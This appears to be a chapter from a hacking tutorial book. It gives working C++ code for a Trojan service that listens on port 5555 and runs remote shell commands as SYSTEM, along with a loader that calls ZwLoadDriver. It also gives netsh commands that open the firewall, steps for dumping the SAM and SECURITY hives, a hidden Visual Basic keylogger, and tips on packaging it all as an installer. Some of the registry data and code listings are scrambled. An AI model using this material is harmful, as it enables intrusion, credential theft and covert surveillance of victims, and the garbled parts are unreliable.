Rings are the security zones in an operating system. The ring structure is analogous to an onion. There may be any number of rings in an OS, but Windows employs 4 rings, namely ring3, ring2, ring1 & ring0. Ring3 is the outermost ring of the operating system, while the innermost ring is ring0. The operating system kernel lies in ring0, and all processes running with very low privileges are in ring3. All device drivers work in kernel mode or ring0 (kernel mode, ring0 and SYSTEM are the same thing). All processes working in ring0 are assigned the user ID SYSTEM; in Windows XP the user working in ring0 is called SYSTEM. We can check the process list with the TASKLIST /V command: all processes running in ring0 will be assigned the user name NT AUTHORITY\SYSTEM.

In Windows 9x there were several ways to leverage the privileges to ring0 directly from ring3. But Windows NT operating systems like NT, 2000, XP, 2003 and Vista do not employ such methods, for security reasons. There is, however, a legitimate way to leverage the privileges. The method employs the same technique by which a device driver is loaded: any user having enough privileges to install a device driver can leverage the privileges to ring0.

The device driver installer programs in NT operating systems use a special function, ZwLoadDriver, exported from NTDLL.dll. ZwLoadDriver takes the driver service registry key name as its only argument. Before the call to this function, the driver must be enlisted in the Windows registry services key, so we need to add the driver service in the registry before uplifting the privileges.

The Windows kernel comprises mainly two layers: the DLL layer and the VXD layer. The VXD layer is also called the device driver layer (V stands for virtual, X for any device & D stands for driver).
Now let us start the attack. There are mainly two shortcut ways to add a service in the registry: use the "REG ADD …" command, or just save any service's data in a file, alter it and import it into the registry again. We can export any service key from the registry, then alter its values in Notepad and import it back into the registry.

Open the registry editor by typing regedit in Run or in a command console. Now open

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services

and select any service name from the left pane which contains 'DisplayName', 'ImagePath' and 'Start' entries in the right pane. One example is aec, or if you have the telnet service on, find Tlntsrv and double-click it. Now in the File menu click 'Export' and it will ask you to save the service key. Now edit the exported service key registry file by right-clicking it and pressing Edit. Edit the entry

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tlntsrv]

to

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\trojan_service_name]

(write trojan_service_name as whatever you want; we named it xtremers). Also change the 'DisplayName' to whatever you want, and change

"Start"=dword:00000003

to

"Start"=dword:00000002

as the dword value 2 means auto start. Delete the Enum entry and its sub-contents. The edited file should look like the one shown. Save the file and double-click it; when prompted, click 'Yes' and then 'OK'. And we have our Trojan service enlisted in the registry.

Then the program to be executed in ring0 should be copied into the %systemroot%\system32 directory. Check out the list of files below that are necessary for leveraging the privileges:

1) A registry file to add the Trojan service name in the registry
2) A Trojan horse to be executed in ring0
3) A vehicle program employing execve to execute the Trojan
4) A launchpad program employing ZwLoadDriver to uplift the privileges

The Trojan horse is a program which looks and works like normal, useful software but can be used to accomplish the work desired by the attacker, e.g. spying, crashing the system or leaking data out. The Trojan should be copied into the system32 directory, and we need a launcher program for our target service to run in ring0.

Now open the service key

HKLM\System\CurrentControlSet\Services\xtremers

and change the ImagePath to the launchpad file; for example, we are going to specify the path of secjmp.exe, and it starts cmd.exe, which already lies in the system32 directory. The whole thing should look like
Well friends, now we need to code a leverager program:

/* xtremersdrv.cpp */
#include <iostream>
#include <windows.h>
using namespace std;

int main (int argc, char* argv[])
{
    HMODULE h;
key:
    char keystr[] = "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\xtremers";
    cout << "Created by ********** Xtremers **********" << endl;
    h = LoadLibrary("ntdll.dll");
    __asm {
        push offset key
        add eax, 0x0000E86F    // change the 0x0000E86F according to your system
        call eax
    }
    system("PAUSE");
    return EXIT_SUCCESS;
}

In the above program we have implemented the code in assembly instructions under the __asm {} block; this is done for the sake of simplicity & compactness of code. We push the offset of the string containing the service key name of our Trojan service, which is actually declared at the label 'key'. Then, with the instruction

add eax, 0x0000E86F

we add the address offset 0x0000E86F of the ZwLoadDriver function to the image base of ntdll.dll. You should keep in mind that the LoadLibrary function returns the image base address of the DLL in the eax register. After the add instruction, the eax register contains the address of the ZwLoadDriver function, and we make the call to ZwLoadDriver with the instruction call eax.

Note: In your case, the RVA offset may be different from the one listed here; it depends upon the OS version. Just change this offset according to your OS version. You can get the exports of any DLL with the help of Dumpbin.exe. In the exports of ntdll.dll, the offset of ZwLoadDriver appears as:

996  3E3  0000E86F  ZwLoadDriver

Now compile the program, restart the computer, run the program, and check the effect in Task Manager by right-clicking the taskbar, selecting 'Task Manager' and selecting the 'Processes' tab.

But there is a problem: we cannot see the executing services or drivers. Still, the software we want to execute in ring0 can accomplish its tasks perfectly. Instead of cmd.exe we can use other desired programs, and we can use sockets for interaction with the program.
Sockets for Interaction with the Service

Sockets are the way softwares interact with each other on local or remote computer systems. We are going to use the same functionality provided by sockets to interact with the leveraged Trojan horse (our program operating in ring0). We follow the same way as before for leveraging the privileges to ring0. Let us code our Trojan horse program first, which will work in ring0:

/* sockex1.cpp */
#include <iostream>
#include <windows.h>
#include <winsock.h>
#define MYPORT 5555
using namespace std;

int main (int argc, char* argv[])
{
    SOCKET sockfd, newfd;
    int sin_size;
    struct sockaddr_in my_addr;
    struct sockaddr_in their_addr;
    char buf[2];
    char bufferStr[100];
    int result = 0;
    WSADATA wsaData;

    // now start the winsock library with WSAStartup function
    if (WSAStartup(MAKEWORD(1, 1), &wsaData) != 0) exit(1);

    // creating a TCP/IP socket, we can create UDP as well
    sockfd = socket(PF_INET, SOCK_STREAM, NULL);
    if (INVALID_SOCKET == sockfd) exit(1);

    my_addr.sin_family = AF_INET;
    my_addr.sin_port = htons(MYPORT);
    my_addr.sin_addr.s_addr = inet_addr("127.0.0.1");  // instead of inet_addr("127.0.0.1") we can also use INADDR_ANY
    memset(&(my_addr.sin_zero), NULL, 8);

    result = bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr));
    if (result != 0) exit(1);
    else cout << "Bind successful" << endl;

    result = listen(sockfd, 1);  // 1 stands for one connection
    if (result != 0) exit(1);

    sin_size = sizeof(struct sockaddr_in);
    newfd = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size);
    if (INVALID_SOCKET == newfd) exit(1);

    send(newfd, "Jet Propulsion Labs, NASA, California", 38, NULL);
    send(newfd, "\n\t\t\t\t\t\tPress 'Q' to terminate the command string", 48, NULL);

cmdEngine:
    send(newfd, "\n\t\t\t\t\tEnter the command: ", 30, NULL);
    int i = 0;
    while(recv(newfd, buf, 1, NULL))
    {
        if (buf[0] == 'Q') break;
        bufferStr[i] = buf[0];
        i++;
    }
    bufferStr[i] = NULL;

    strcat(bufferStr, ">>d:\\myservice\\outresult.log");
    // cout << "The assembled string is: " << bufferStr << endl;
    system(bufferStr);

    send(newfd, "\nDo you want to continue: [y/n]", 44, NULL);
    recv(newfd, buf, 1, NULL);
    if ((buf[0] == 'y') || (buf[0] == 'Y')) goto cmdEngine;
    else send(newfd, "\n\t\t\t\t\t\tSafely exiting the server", 50, NULL);

    closesocket(newfd);
    return EXIT_SUCCESS;
}

Note: Because this program utilizes socket programming, after saving the program 'Build' it, then in Project 'Settings' in the 'Project' menu select the 'Link' tab, add the entry wsock32.lib in the 'Object/library modules:' text box, and then compile the program. For a vivid look at socket programming, you must take a look at the Socket Programming section in the Remote Exploit section.

The above program opens a socket on port 5555 and listens for an incoming connection. If connected, it will send the greeting "Jet Propulsion Labs, NASA, California" and other notifications, such as "to terminate the command string press 'Q'". The program doesn't show the output of the commands; instead it redirects the output to a file outresult.log in the d:\myservice folder (create the folder in the d: drive before the operation starts). Once in ring0, the above program will have a vast number of powers; actually, we cannot imagine its powers. We can do whatever we want to do; e.g. we can launch other programs on the system with ring0 privileges (the SYSTEM or NT AUTHORITY user) and can perform unrestricted computing.

Remember that the executer program is the one listed in the registry key, and not sockex1.exe directly. Let us code its executer program, which will be responsible for launching sockex1.exe in memory from the system32 directory.
The whole setup is analogous to a satellite and rocket assembly. We have coded the satellite, i.e. sockex1.exe, and now we are going to code the rocket, i.e. the launching program, pslv.cpp (PSLV stands for Polar Satellite Launch Vehicle, a rocket developed by the Indian Space Research Organisation for carrying satellites to their respective polar orbits in space). The code of pslv.cpp is:

/* pslv.cpp */
#include <iostream>
#include <process.h>
using namespace std;

int main (int argc, char* argv[])
{
    char *program, *argsArray[2];
    program = "c:\\windows\\system32\\sockex1.exe";
    argsArray[0] = "sockex1";
    argsArray[1] = NULL;
    execve(program, argsArray, NULL);
    return EXIT_SUCCESS;
}

Now we need a registry file; it acts like the satellite control system in the real world. Well friends, we have already formed a registry file for the earlier example. We can either use the reg add command or use a registry file: the registry file can be prepared by exporting any other service key into a backup file and then altering the backup file by just changing the service name. Then execute the altered backup file to add the altered service to the registry, and then alter the ImagePath binary value to the path which points to the pslv.exe program. The registry file after all corrections is backed up again and is shown below:

Windows Registry Editor Version 5.00
00.00.00.00.00.00.00.65.74.00.00.00.00.5c.00.43.75.4c.53. "DependOnGroup"=hex(7):00.6e.00.6e.54.00.\ 65.53.00.75.64.00.67.65.72.61.00.20.00.65.00.65.50.exe injects the 215 .00.64.61. The launchpad.62.00.00.00 "DisplayName"="sysTrojan" "Description"=hex(2):4b.00.43. The launch pad is the program that actually works similar to the real world satellites launchpad.44.65.00.00.00.00.00.00 "DependOnService"=hex(7):52.00. But above file is a backup of our own Trojan service.\ 64.4e.00.00.00.00.00.63.5c.00.00.72.00.00.00.3a. The value 2 in double word start "Start"=dword:00000002 Means the service will start automatically after booting of Operating System.00.00.00. then it means the service can be started manually and value 4 means it is disabled.00.00.00.53.0 0.00.\ 00.5c.65.2e.exe to leverage the sysTrojan service in ring0.00. 78.53.00.00.00.43.75.64.00. After adding the registry service keys its time to prepare the launchpad.00.00.00.6d.00.45.4d.[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sysTrojan] "Type"=dword:00000010 "Start"=dword:00000002 "ErrorControl"=dword:00000001 "ImagePath"=hex(2):43.70.00.73.00.0 0.\ 00 49.00.00.00.00.6f.00.5c.54.63.63.00.00. 00.65.00.00.20.\ 6c. 73.00.78.00.00 "ObjectName"="LocalSystem" We have named our new Trojan service sysTrojan.4d.72.65.00.65.00.00.76.00.00.00.00.64. Initially you need to alter only the two entries shown in bold and save the file and then alter the ImagePath field in registry.00.00.00.20.00.00.65.00.73.\ 00.6d.6d.20.6f.65. In our example we are using the launchpad.00.63.70.00.00.00.50.6e.00.00.00.50. If it will be 3.5c.6f .64.69.00.00.50.
dll").file enlisted in sysTrojan service (pslv.h> using namespace std. success: cout << endl. cout << "The Trojan successfully leveraged to ring0.cpp */ #include <iostream> #include <windows. hmod = LoadLibrary("ntdll. 0x0000E86F call eax } __asm { test eax. The code for launchpad. exit(1). int main (int argc.cpp is as /* launchpad." << endl. After next reboot the Task manager will show up the sockex1. __asm { push offset keyName add eax.".exe with System user associated with it as 216 . keyName: char keyPath[] = "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\sysTrojan". return EXIT_SUCCESS.exe and reboot the system. } { Execute the launchpad.exe) in kernel mode (in ring0). char* argv[]) HMODULE hmod. 0 je success } failed: cout << "Failed to leverage Trojan to ring0.
shown. But the sockex1.exe is prepared to hold only one connection. After the connection is terminated, the Trojan service will deny all connections until it is restarted again. It can be restarted by the command:

Net start sysTrojan

It will show that the service is not responding, but the service will get restarted in the back end. The error message is shown because sysTrojan is not listed in the started-services cache. We can alter the code of sockex1.cpp so as to make it non-blocking, hold more connections simultaneously, and keep the service running even if all the connections are terminated. One more thing: while attempting to connect to sysTrojan at
port 5555 from a remote system, the firewall may prevent the connection and foil the attack. We can open port 5555 in the Windows XP internal firewall with the following command:

netsh firewall set portopening ALL 5555 sysTrojan ENABLE ALL

or

netsh firewall add portopening ALL 5555 sysTrojan ENABLE ALL

Or instead we can authorize the program to open any port, and thus any connection, with the following command:

netsh firewall add allowedprogram c:\windows\system32\sockex1.exe sysTrojan ENABLE

We can also add the above commands in pslv.cpp, in the system function or as arguments of the execve or execl functions. Now is the time to check out the command execution in ring0 and test-ride the privileges. Tell us, how do you feel after running your commands in kernel mode?
Test Ride ring0

Let us take an example: the registry. The registry is the workhorse of the Windows OS. Every event is traced to the registry, and even a single click of the mouse concerns the registry. If you are a registry expert, then you can modify the whole operating system without using the Control Panel. Friends, we can open the registry editor by writing regedit or regedt32 in Run or at a command console. In the Windows registry there are a few sub-keys to which even administrators cannot get access. Two of such keys are HKEY_LOCAL_MACHINE\SAM and HKEY_LOCAL_MACHINE\SECURITY. These two keys control and contain all the user-related data and security policies. For security reasons even administrators are restricted from opening these two sub-keys; only modules executing in ring0 can open these keys.

We are going to use the registry commands using our sysTrojan service. As all commands executed with sysTrojan run in NT AUTHORITY mode (ring0 or kernel mode), there will be no restriction at all.

Note: Export the registry into a backup file before altering anything. Do not try to change any value if you don't know what it will result in. Even Microsoft prompts you that you alter registry items at your own risk.

Open a command console, or write the following in the Run text box:

Telnet <computername or IP address> 5555

as in the figure. And click OK; it will connect to the sysTrojan service as
Now, we have to use a trick: actually, we are going to back up the two keys listed above using the reg export command. Let's do it:

Reg export HKLM\SAM hacksam.reg

For more help, try the following command:

Reg export /?

Check the stuff in action in the following figure. The 'Q' terminates the command, as shown in the message above the command. The above command will create a registry file
hacksam.reg in the system32 folder. Copy that file to any convenient place, then right-click on hacksam.reg and click Edit; otherwise, open it in Notepad. Now click on the Edit menu and click Replace; type HKEY_LOCAL_MACHINE in the 'Find what' text box, and in the 'Replace with' text box write HKEY_LOCAL_MACHINE\SOFTWARE\HackSam, as in the figure:
And click on Replace All. Then Save As the file with a new name, "hackedsam.reg" (keep the file name inside double quotes to save it as a .reg file; otherwise, Notepad will save it as a text file), and double-click this registry file. It will show a dialogue for merging the information contained in hackedsam.reg into the registry; click on 'Yes' as in the figure, and once again in the following dialogue. Now open the registry editor by writing regedit in Start->Run and check the following key:

HKEY_LOCAL_MACHINE\SOFTWARE\HackSam
We can open the Sam sub-key under the HackSam sub-key and check all the values in SAM.

The SAM key contents

In the same way we can hack the HKEY_LOCAL_MACHINE\SECURITY key and create an alternative key in SOFTWARE. As in the next figure, we have created a new sub-key vHack in the HKEY_LOCAL_MACHINE\SOFTWARE key which contains the HKEY_LOCAL_MACHINE\SECURITY sub-key.
The SECURITY key contents

Note: We can't create any sub-key directly in HKEY_LOCAL_MACHINE, for security reasons; even administrators are not allowed to do so. But we can create a sub-key inside any sub-key of HKEY_LOCAL_MACHINE.

So now you are the most powerful user of Windows XP by leveraging to ring0. What are you waiting for, friends? It is the time to explore the uses of this ultimate power in your computing life.

The above technique can be used in spyware and keyloggers. Normally, keyloggers or spyware cannot intercept the Windows login user ID & password. This is because the SAS agent (Security Authentication Service agent) shuts off all the processes working with user credentials during the logon process. The SAS agent is implemented by a DLL file, msgina.dll. On networked environments you may have encountered the dialogue prompting you to press the "CTRL + ALT + DEL" keys before the logon process (in Windows XP the dialogue is muted by default). This message is the result of the function WlxDisplaySASNotice provided by msgina.dll. The above keys, when pressed together while no user is interactively logged on to the system, cause the kernel to
invoke the SAS agent. The SAS agent then shuts off all user processes and starts the logon process. This is the nightmare of administrators, because the VXD layer is not affected by it. The VXD layer is an essential component of the kernel itself, and any program injected into the VXD layer will not be shut off; thus it can install a hook into the kernel processes as well. Therefore, the logon process can also be logged, via a system-wide hook on the keyboard by a keylogger in the VXD layer, which is not possible for spyware or keyloggers working with user credentials (even with administrator credentials). Well, most people still think that their logon passwords are safe even if spyware is installed on the system; throw away such thoughts, think again, and be careful.

Actually, all the above files can be packed inside a single package or installer. We can use the iExpress utility provided with Windows XP to create a SED (Self Extraction Directive) file. Just type iExpress in the Start->Run box and a wizard will be started for you to create an installer for your files. But you have to code another file employing copy commands, which will actually copy the files into their respective places (like system32), and one registry command. All these commands are just commands of the command prompt. We think you can code such a program. Enjoy a hacker's life.
The Privileges Leveraging Using DLL Injection

Other techniques are there to leverage the privileges. In one technique, the code that needs to be executed in kernel mode is coded inside a DLL, and that DLL is injected inside a process running in kernel mode. Actually, one process forces the other process (the process running in kernel mode), using its process identifier, to load the DLL & execute the code from the DLL inside the other process's address space. The process ID can be grabbed automatically by using the CreateToolhelp32Snapshot, Process32First and Process32Next functions.

Instead of exploiting any vulnerability, the DLL injection in such a technique is done somewhat differently. The attacking process cannot execute code present in its own address space directly in the victim, to avoid memory-sharing violations. Instead, the attacking process writes a few bytes of machine code into the address space of the victim process: it writes the DLL name into a memory location in the remote process's memory space, for the LoadLibraryA function in the victim process, using VirtualAllocEx, WriteProcessMemory and the process ID of the victim process. These machine code bytes, when executed, load the required DLL in the victim process and pass execution to the DLL's code. The machine code bytes and the DLL code execute in a separate thread created by the CreateRemoteThread function, which creates a thread executing in the remote process and running code present in the remote process's memory space.
Privileges Leveraging by the Scheduled Tasks Service

This technique is the simplest technique for privilege leveraging on the Windows platform. The technique involves the Task Scheduler service in Windows. Microsoft provides this facility for legally leveraging the privileges in Windows. But there is a flaw in this service: if a task is scheduled with the interactive switch of the "AT" command and the currently logged-in user is not a privileged user, even then the task will be executed for that logged-in low-privileged user with kernel-mode privileges.

Ensure the Task Scheduler service is running with the following command:

NET START SCHEDULE

In Windows XP the Scheduled Tasks service is by default automatically started every time Windows boots up. Now open the command console and use the AT command to add a task as:

AT 7:32AM /interactive cmd.exe

Always specify the time with an interval of at least 1 minute; otherwise, the task will be scheduled for the next day. The '/interactive' option enables the opened program to interact with the desktop; without it, the program will execute like a service. The program will be opened with kernel-mode privileges if no runas user is specified in the command. Well friends, the Schtasks command can also be used in Windows XP for the same purpose.
Leveraging Privileges in Linux

In Linux systems we don't need more than one file, i.e. the module to be injected in kernel mode. Leveraging the privileges in Linux is much easier than in Windows once you are root, but the problem is that the programs to be injected into the kernel are not programmed like other application programs. This is because the Linux kernel does not have an API, unlike the Windows kernel, which is composed of two layers, the VXD layer & the DLL layer; the DLL layer provides the API facility for a program to be injected in kernel mode. The applications in Linux use libraries like libc and others for their execution. These libraries are not part of the kernel itself, therefore applications cannot execute inside the kernel. Instead, the kernel itself has an interface that helps in executing its code, and any program inside the kernel has to use this interface for its execution. The device drivers or modules to be injected in kernel mode have a specific structure: they employ the init_module() and cleanup_module() functions.

The job can be accomplished by a single command by any power user or root. The command is:

insmod ./<modulename.o>

We can check the loaded modules working in ring0 with the following command:

lsmod

And to unload any module from the kernel, we have to use the following command:

rmmod

We can also use the modprobe utility to install or remove modules from the kernel. Once in kernel mode, we can wipe out the normal working modules and control the whole Linux machine.
The Spyware
The Stalking

The term spyware, or nowadays anti-spyware, is now common among computer users and means a software or a piece of software (like an ActiveX control, OLE component, DLL, or whatever) that keeps an eye on the activity of the users of the host system. The final motto of a spyware is stalking. Stalking is done by different stalkers differently & it depends upon the purpose. E.g. the e-commerce websites keep track of a user's selections, decide his interests, and present him with objects of his interest, whereas some people want to surveil the activity of other people on their systems. The software implementation of a stalker is called spyware.

A spyware can keep track of keypresses, screenshots, the list of opened programs, audio and visual recordings, etc. A spyware with only the ability to record the keys pressed is also called a keylogger. An average spyware can record pressed keys & capture screenshots. An equipped spyware has the ability to record audio and capture images and video from the surroundings of the hosting system, provided the host system is equipped with a camera and microphone.

I mentioned the term anti-spyware above to mean the same as spyware; this is because most spywares advertise themselves as anti-spyware, gain the trust of innocent users, and install themselves on the system.

First we'll develop the keyloggers, and then we'll discuss and develop the spyware with screenshot-capture capability.
Developing a Key-logger

Being a hacker without getting true control and filters of the system is shameful. In this section we'll develop a very basic key logger in Visual Basic 6.0. Friends, if you don't know how to program in Visual Basic, no problem; the things are simpler and not weird in Visual Basic, therefore you should follow this section even if you don't know how to program in VB. Just learn a "Hello World" program first and then try a hand at this section; otherwise, it will take just a few minutes longer for you to find the things.

Open the Visual Basic 6.0 editor and select Standard EXE from the New Project window. The Form1 will be shown as in the picture.

The Visual Basic Editor

Then draw a text box, two labels, a command button and a
timer on the Form1, using the tools provided in the general toolbox on the left side of the editor, as shown in the following picture. Change the Form1's Caption from Form1 to Console. Select Label1, and in the Properties window select Caption and type the title of your keylogger; we typed LOX KEYGRABBER and selected appropriate font settings by editing the Font property. Similarly, for Label2 set the caption File, and for Command1 the caption Start KeyScan. And remove the Text1 from the Text property of the Text1 textbox.
Now click on the Project menu, select Add Module, then select Module from the New tab and click Open. (You can also select the form's background color by clicking on the form and then setting the BackColor property of Form1 from the Properties window.) Now write the following line into the module:

Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer

The above declaration text should be on a single line. Now again select the Form window; from the View menu select Code and type the following lines:

Dim strLetter As String
Dim strCollector As String
Dim strFile As String
Now select Object from the View menu and double-click the form (not the controls; the labels, text boxes, buttons, etc. are called the controls), and type the following lines in the Form_Load subroutine as shown below:

Private Sub Form_Load()
    dwAttrib = 34
    strLetter = ""
    strCollector = "The begining:"
    Timer1.Enabled = False
    Timer1.Interval = 140
    exitCode = 0
End Sub

Similarly, double-click on the Timer control on the form and type the following code in the code window:

Private Sub Timer1_Timer()
    For i = 28 To 128
        If GetAsyncKeyState(i) <> 0 Then
            strLetter = Chr(i)
            strCollector = strCollector & strLetter
        End If
    Next i
    Open strFile For Output As #1
    Print #1, strCollector
    Close #1
End Sub

Now again select the Object from the View menu, double-click the Command1 button (caption Start KeyScan) and type the following code:

Private Sub Command1_Click()
    App.TaskVisible = False
    Form1.Visible = False
    Form1.Hide
    If Text1.Text = "" Then
        strFile = "c:\grabbed.txt"
    Else: strFile = Text1.Text
    End If
    Timer1.Enabled = True
    Command1.Caption = "Stop KeyScan"
End Sub

Now save the form and the project with the name keygrabber, and from the File menu click on Make keygrabber.exe; that's the simplest keylogger we've developed. Now execute keygrabber.exe and press Start KeyScan, and keygrabber.exe will be hidden from the desktop (but not from Task Manager or tasklist) and will grab all the keystrokes, by default into the c:\grabbed.txt file, or otherwise into the file specified in the text box. The whole source code is shown below:

Dim strLetter As String
Dim strCollector As String
Dim strFile As String

Private Sub Command1_Click()
    App.TaskVisible = False
    Form1.Visible = False
    Form1.Hide
    If Text1.Text = "" Then
        strFile = "c:\grabbed.txt"
    Else: strFile = Text1.Text
    End If
    Timer1.Enabled = True
    Command1.Caption = "Stop KeyScan"
End Sub

Private Sub Form_Load()
    dwAttrib = 34
    strLetter = ""
    strCollector = "The begining:"
    Timer1.Enabled = False
    Timer1.Interval = 140
    exitCode = 0
End Sub

Private Sub Timer1_Timer()
    For i = 28 To 128
        If GetAsyncKeyState(i) <> 0 Then
            strLetter = Chr(i)
            strCollector = strCollector & strLetter
        End If
    Next i
    Open strFile For Output As #1
    Print #1, strCollector
    Close #1
End Sub

The picture shown below shows the keygrabber.exe window.

The keygrabber.exe
Shellcode

The code that is self-sufficient to provide a shell when executed in the environment of another process is called shellcode. But the real definition of shellcode has undergone a change with time and with advancements in security & technology. Shellcode development is just like developing a payload for a missile: it should be light, undetectable & must achieve its goals successfully.
Preliminaries of Shellcode development

The development of shellcode requires a little understanding of assembly language, the target memory, the target operating system, and the firewalls and IDS/IPS systems. We shall be discussing shellcode development for Linux as well as for Windows systems. Shellcode development is somewhat easier in Linux than in Windows, because in Windows, for several API functions, we have to load the corresponding DLL into the process's memory space and then calculate the offset of the corresponding member function. Linux instead uses syscall numbers, which do not change across its different versions, at least. The syscalls can be considered analogous to the Windows API functions (the DLL exports).
Shellcode development for Windows (XP, 2000, 2003)

The shellcode for Windows falls into two categories:
1) Hardcoded address shellcode
2) Non-hardcoded address shellcode
The hardcoded shellcodes use the addresses of system calls hardcoded into the shellcode, while in non-hardcoded shellcode the addresses of the syscalls are searched for in the memory of the executing process.
Networking

Machines can also talk to each other by means of networking. Using networks, one can tremendously increase the efficiency and reliability of his business. In this world, you will find most systems connected in networks rather than standing individually. With an increase in the size of a network, security becomes the major issue, and to hack a network there are a lot more issues to be taken care of than to hack individual systems. Therefore, to be a complete hacker, you must have some networking knowledge. We are going to start with a discussion of the different layers of a network rather than the networking topologies.

OSI Network Layer Model

ISO designed the standardized architecture of networks known as OSI (Open Systems Interconnection). The OSI architecture is a layered model of an ideal network. A network is actually a group of several protocols working together, and different protocols work at different levels in a network, known as layers. The layers were introduced to isolate the different independently working protocols in a network: a single layer may have several independently working protocols, but protocols in different layers depend upon each other for a successful network transmission. For a network to be successful in the transmission of data and information, the corresponding counterpart systems must also be running the same set of protocols. The OSI model consists of 7 different layers working together, which are:

1) Physical
2) Data link
3) Network
4) Transport
5) Session
6) Presentation
7) Application

As shown in the figure.
Network Layers Architecture

Physical Layer: This is the 1st layer of the OSI model. This layer is composed of hardware: the network cables and other network hardware devices lie in this layer. The data in this layer flows in the form of electric signals. This layer depends upon the network topology used.

Data Link Layer: This is the 2nd layer of the OSI model. The Ethernet protocol works in this layer. The data flows in the form of message frames in this layer, and the devices in this layer are addressed using their hardware address, also known as the MAC (Media Access Control) address. Each message frame consists of a header part with a source MAC address & a destination MAC address. Switches and hubs work in this layer. Broadcasting is the main facility in this layer: broadcast means a single frame of data is addressed to all systems connected in that network segment. All wireless networking protocols are linked into this layer with the other network segments.
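The frame layout described above is easy to see in code. A minimal sketch in Python (the addresses and payload bytes below are invented for illustration):

```python
import struct

# An Ethernet II frame starts with a 14-byte header: destination MAC (6 bytes),
# source MAC (6 bytes) and a big-endian EtherType (2 bytes). EtherType 0x0800
# marks an IPv4 payload.
frame = (bytes.fromhex("ffffffffffff")      # destination: the broadcast address
         + bytes.fromhex("001122334455")    # source MAC (made up)
         + bytes.fromhex("0800")            # EtherType: IPv4
         + b"...payload...")

dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])

def mac(b: bytes) -> str:
    # render a 6-byte hardware address in the usual colon notation
    return ":".join(f"{x:02x}" for x in b)

print(mac(dst))        # ff:ff:ff:ff:ff:ff  (broadcast: every host on the segment)
print(mac(src))        # 00:11:22:33:44:55
print(hex(ethertype))  # 0x800
```

The `!` in the struct format marks network (big-endian) byte order, which is how multi-byte fields travel on the wire.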
Network Layer: This is the 3rd layer of the OSI model. The networked systems are identified with IP (Internet Protocol) addresses in this layer, and the networks are broken into logical segments in this layer. The data is encapsulated into a packet known as an IP packet; the IP header contains the source & destination IP addresses. The routers work in this layer, the routing protocols work in this layer, and IP multicasting is done in this layer.

Transport Layer: The transport layer is the 4th layer of the OSI model and the most important layer. TCP (Transmission Control Protocol) and UDP (User Datagram Protocol) work in this layer. TCP is a reliable protocol while UDP is an unreliable protocol. The reliability in TCP means that lost or erroneous packets are thrown away and a request for the discarded data is sent to the server again; the data sent and received is accompanied by acknowledgement receipts known as ACK packets. Before a new connection is formed in TCP, the three-way handshake is done, which goes like this: the client sends a request along with its own sequence number, and the data packet so formed is called a SYN packet. The server receives the SYN packet from the client and sends an acknowledgement along with its own sequence number; the data packet in this case is called a SYN/ACK packet. The client receives this packet and sends back an ACK packet acknowledging the server's sequence number, and the connection is established. In this way packet tracking is done using two sequence numbers, one from the client and the other from the server. The early arrival of any packet with a sequence number expected in the future is kept in memory for later use: if the delayed packet arrives again later, it is discarded, and only the copy that already arrived and was kept in the memory buffer is used. The arrival of an unexpected packet causes the resetting of the connection: the receiver of the unexpected packet sends a RST packet, the connection is discarded, and the whole handshaking process begins again. This leads to attacks on the TCP protocol: the attacker can inject any data he wants if he guesses the sequence numbers perfectly and sends his packets before the respective nodes send those sequenced packets.
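The three-way handshake is carried out by the operating system's TCP stack; in a high-level language it happens invisibly inside connect() and accept(). A loopback sketch in Python:

```python
import socket
import threading

# connect() sends the SYN and returns once the SYN/ACK has been answered with
# the final ACK; accept() returns on the server side once the handshake is done.
def tcp_handshake_demo() -> bytes:
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))   # port 0: let the OS pick a free port
    srv.listen(1)
    port = srv.getsockname()[1]

    def server() -> None:
        conn, _addr = srv.accept()   # handshake already completed here
        conn.sendall(b"hello")
        conn.close()

    t = threading.Thread(target=server)
    t.start()

    cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    cli.connect(("127.0.0.1", port))  # SYN -> SYN/ACK -> ACK happens here
    data = b""
    while len(data) < 5:              # read until the full reply has arrived
        chunk = cli.recv(5 - len(data))
        if not chunk:
            break
        data += chunk
    cli.close()
    t.join()
    srv.close()
    return data
```

Only after the kernel-level handshake completes does either side get to exchange application data.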
The other common protocol that works in the transport layer is UDP. UDP is fast and non-reliable: no packet tracking is done in this protocol, i.e., no acknowledgements are sent. Non-reliability here means that lost packets will not be recovered by the protocol again; the reliability can be implemented in the upper layers by the developers, and the respective applications that use UDP perform all the necessary error checks in their own upper layers. This protocol results in less network traffic than TCP and provides a faster means of transportation, so it is used where speed matters and reliability is not the big issue. This protocol is widely used in IP telephony, live video, and network games.

Session Layer: The session layer, as the name suggests, keeps track of all connections (sessions). This layer keeps track of the data provided by the upper layers and sends it to the respective lower layer circuits.

Presentation Layer: This layer is the most important from a security point of view. This layer prepares the data provided by the application layer in accordance with the lower layer's input format. The encryption, if applied, can be applied here on the data.

Application Layer: This layer is the main application, i.e., the program, which may or may not be interacting with the user.
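The fire-and-forget nature of UDP shows up clearly in code: there is no listen/accept/connect step at all. A loopback sketch:

```python
import socket

# UDP is connectionless: no handshake, no sequence numbers, no ACKs. A
# datagram is handed to the kernel and either arrives or is silently lost.
def udp_loopback(msg: bytes) -> bytes:
    rx = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    rx.bind(("127.0.0.1", 0))                # OS picks a free port
    port = rx.getsockname()[1]

    tx = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    tx.sendto(msg, ("127.0.0.1", port))      # fire and forget: no connection
    data, _addr = rx.recvfrom(1024)
    tx.close()
    rx.close()
    return data
```

On the loopback interface the datagram is practically guaranteed to arrive; across a real network, an application needing reliability must detect and resend losses itself.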
The IDS, IPS & Firewall Systems

In this section we are going to discuss the way firewall & IDS/IPS systems work and the ways to get past them safely. Actually, this subject is vast and cannot be covered here, so we'll be discussing only the required points.

The NAT

